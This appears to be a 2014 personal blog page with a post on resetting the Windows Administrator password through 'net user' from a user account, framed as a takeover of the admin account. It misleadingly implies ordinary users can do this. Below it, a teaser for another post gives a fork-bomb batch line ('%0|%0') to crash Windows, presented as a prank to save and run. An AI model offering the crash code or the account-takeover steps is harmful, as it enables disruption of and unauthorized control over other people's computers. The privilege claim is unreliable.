Friday, January 24, 2014

How to change admin password on a computer

So follow these steps to change the admin password for a windows machine
1. Login to the computer with a user account.
2. Go to the Start button and run cmd to do this you would type cmd and then hit enter.
3. You will notice a new window of command prompt will get opened.
4. Type net user without quotes and hit enter this command will show you all the users on that computer.
5. Type net user administrator * without quotes and hit enter on your keyboard.
6. This will ask you for the password. Type a new password and confirm it by re-entering it.
7. You have now successfully changed the password of Administrator account.

hope this was useful please like subscribe and follow

No comments:

Post a Comment

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...